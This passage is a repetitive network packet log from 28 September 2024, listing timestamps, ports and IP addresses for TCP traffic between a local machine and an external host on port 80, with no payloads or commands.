Sep 28, 2024 07:32:12.446257114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446266890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446276903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446281910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.446291924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.446310043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.446527004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446537971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446547985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446556091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446567059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446578979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446594000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.446594000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.446619034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.446686029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446696997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446737051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.446803093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446813107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446822882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446827888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.446845055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.446871996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447069883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447079897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447088957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447093964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447105885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447117090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447118044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447127104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447138071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447146893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447148085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447159052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447170019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447176933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447197914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447212934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447491884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447503090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447513103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447524071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447534084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447541952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447568893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447765112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447777033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447786093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447797060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447807074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447813988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447818995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447829962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447829962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447843075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447849035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447854996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.447865963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.447896004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448525906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448535919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448545933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448554993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448564053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448574066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448577881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448585987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448591948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448596001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448606968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448613882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448617935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448627949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448637962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448640108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448648930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448661089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448664904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448673010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448695898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448710918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448877096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448887110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448896885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448906898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448919058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448920965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448930025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448940039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448946953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448956013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.448961020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.448976994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.449002028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.449028015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449042082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449050903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449065924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449074030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.449076891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449089050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449098110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449100018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.449107885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449119091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449125051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.449129105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449141026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449150085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.449151993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449163914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449174881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.449198008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.449947119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449958086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449968100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449976921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449985981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449995041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.449999094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450006008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450011969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450016975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450028896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450037956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450041056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450057983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450064898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450069904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450082064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450092077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450093985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450105906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450112104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450119972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450138092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450164080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450707912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450717926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450726986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450737000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450747013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450756073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450766087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450767040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450777054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450787067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450795889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450802088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450805902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450817108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450826883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450828075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450841904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450843096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450855017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450865030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450865030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450875044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450885057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.450885057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450911045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.450934887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.451586008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451596975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451605082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451616049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451625109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451634884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451634884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.451646090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451657057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451662064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.451666117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451677084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451682091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.451689005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.451705933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.451719999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537204981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537235975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537247896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537275076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537302971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537343025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537353992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537370920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537380934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537380934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537391901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537410021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537436962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537564993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537583113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537607908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537631035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537633896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537645102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537656069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537671089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537673950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537682056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537684917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537695885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537703037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537729979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537923098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537934065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537951946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537961960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537971973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.537978888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.537982941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538003922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538039923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538191080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538242102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538248062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538258076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538290977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538314104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538336039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538347006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538356066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538362980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538383961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538408995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538570881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538582087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538592100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538602114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538619995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538634062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538743973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538754940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538765907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538777113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538785934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.538795948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.538820982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539236069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539288998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539314032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539324999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539350986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539370060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539397955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539407969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539418936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539428949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539464951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539464951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539552927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539592981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539623022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539633036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539673090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539684057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539722919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539752960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539768934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539779902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539804935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539818048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539872885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539912939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.539942026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.539990902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540016890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540028095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540038109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540066004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540090084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540237904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540247917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540260077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540271044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540281057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540287971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540292025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540302992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540312052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540314913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540323973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540337086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540352106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540380001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540579081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540590048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540600061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540627003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540649891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540873051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540884018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540894032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540904999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540920019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540920019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540931940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540935040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540942907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540952921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540963888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540965080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540973902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540975094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.540985107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540996075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.540998936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541011095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541023970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541050911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541346073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541357040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541398048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541441917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541451931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541461945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541471958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541481972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541490078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541510105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541524887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541699886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541711092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541722059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541749001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541775942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541785955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541795969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541800976 CEST	80	49730	185.215.113.37	192.168.2.4
